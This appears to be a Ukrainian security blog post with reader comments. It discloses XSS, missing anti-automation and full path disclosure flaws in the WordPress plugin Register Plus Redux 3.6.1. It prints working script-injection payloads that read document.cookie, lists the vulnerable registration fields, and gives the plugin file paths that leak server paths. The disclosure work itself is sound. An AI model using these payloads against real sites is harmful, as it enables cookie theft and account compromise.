Уразливості в Register Plus Redux для WordPress
15:01 02.12.201018.09.2010
Сьогодні я знайшов Cross-Site Scripting, Insufficient Anti-automation та Full path disclosure уразливості в плагіні Register Plus Redux для WordPress. Про що найближчим часом повідомлю розробникам.
Register Plus Redux є розгалуженням плагіна Register Plus (нова версія від іншого розробника). І уразливості в них подібні (можуть лише адреси відрізнятися).
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам плагіна.
02.12.2010
XSS:
POST запит на сторінці http://site/wp-login.php?action=register
"><script>alert(document.cookie)</script>
В полях: First Name, Last Name, Website, AIM, Yahoo IM, Jabber / Google Talk, Password, Confirm Password.
</textarea><script>alert(document.cookie)</script>
В полі: About Yourself.
Insufficient Anti-automation:
http://site/wp-login.php?action=register
В формі реєстрації немає захисту від автоматизованих запитів (капчі).
Full path disclosure:
http://site/wp-content/plugins/register-plus-redux/dash_widget.php
http://site/wp-content/plugins/register-plus-redux/register-plus-redux.php
При POST запиті на сторінці http://site/wp-login.php?action=register.
Уразливі версії плагіна Register Plus Redux 3.6.1 та попередні версії.
П'ятниця, 15:02 14.01.2011
Чи отримали Ви відповідь від розробника, та чи були враховані ці помилки в останній версії 3.6.22?
Дякую за відповідь
П'ятниця, 16:00 14.01.2011
Vrefr
Ні, відповіді я не отримав. Ні від розробника оригінального модуля Register Plus, ні від розробника Register Plus Redux (що є типовим для веб розробників, в тому числі розробників плагінів до веб додатків).
Тому нічого не знаю про те, чи була виправлена в версії 3.6.22 хоча б одна з зазначених уразливостей. В Changelog плагіна Register Plus Redux про це не згадується. Всі користувачі плагіна можуть це перевірити (використавши наведену інформацію) та виправити дірки власноруч, якщо цього не зробив розробник плагіна.